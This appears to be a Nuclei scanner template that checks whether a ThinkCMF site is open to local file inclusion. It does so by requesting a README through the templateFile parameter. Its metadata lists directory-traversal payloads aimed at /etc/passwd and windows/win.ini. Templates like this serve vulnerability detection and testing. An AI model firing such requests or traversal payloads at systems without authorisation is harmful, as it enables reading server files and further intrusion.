id: thinkcmf-lfi info: name: ThinkCMF - Local File Inclusion author: pikpikcu severity: high description: ThinkCMF is vulnerable to local file inclusion. reference: - https://www.freebuf.com/vuls/217586.html metadata: max-request: 1 win-payload: ../../../../../../../../../../../../../../../../windows/win.ini unix-payload: ../../../../../../../../../../../../../../../../etc/passwd classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 tags: thinkcmf,lfi http: - method: GET path: - "{{BaseURL}}/?a=display&templateFile=README.md" matchers-condition: and matchers: - type: word condition: and words: - "ThinkCMF" - "## README" - "## UPDATE" - type: status status: - 200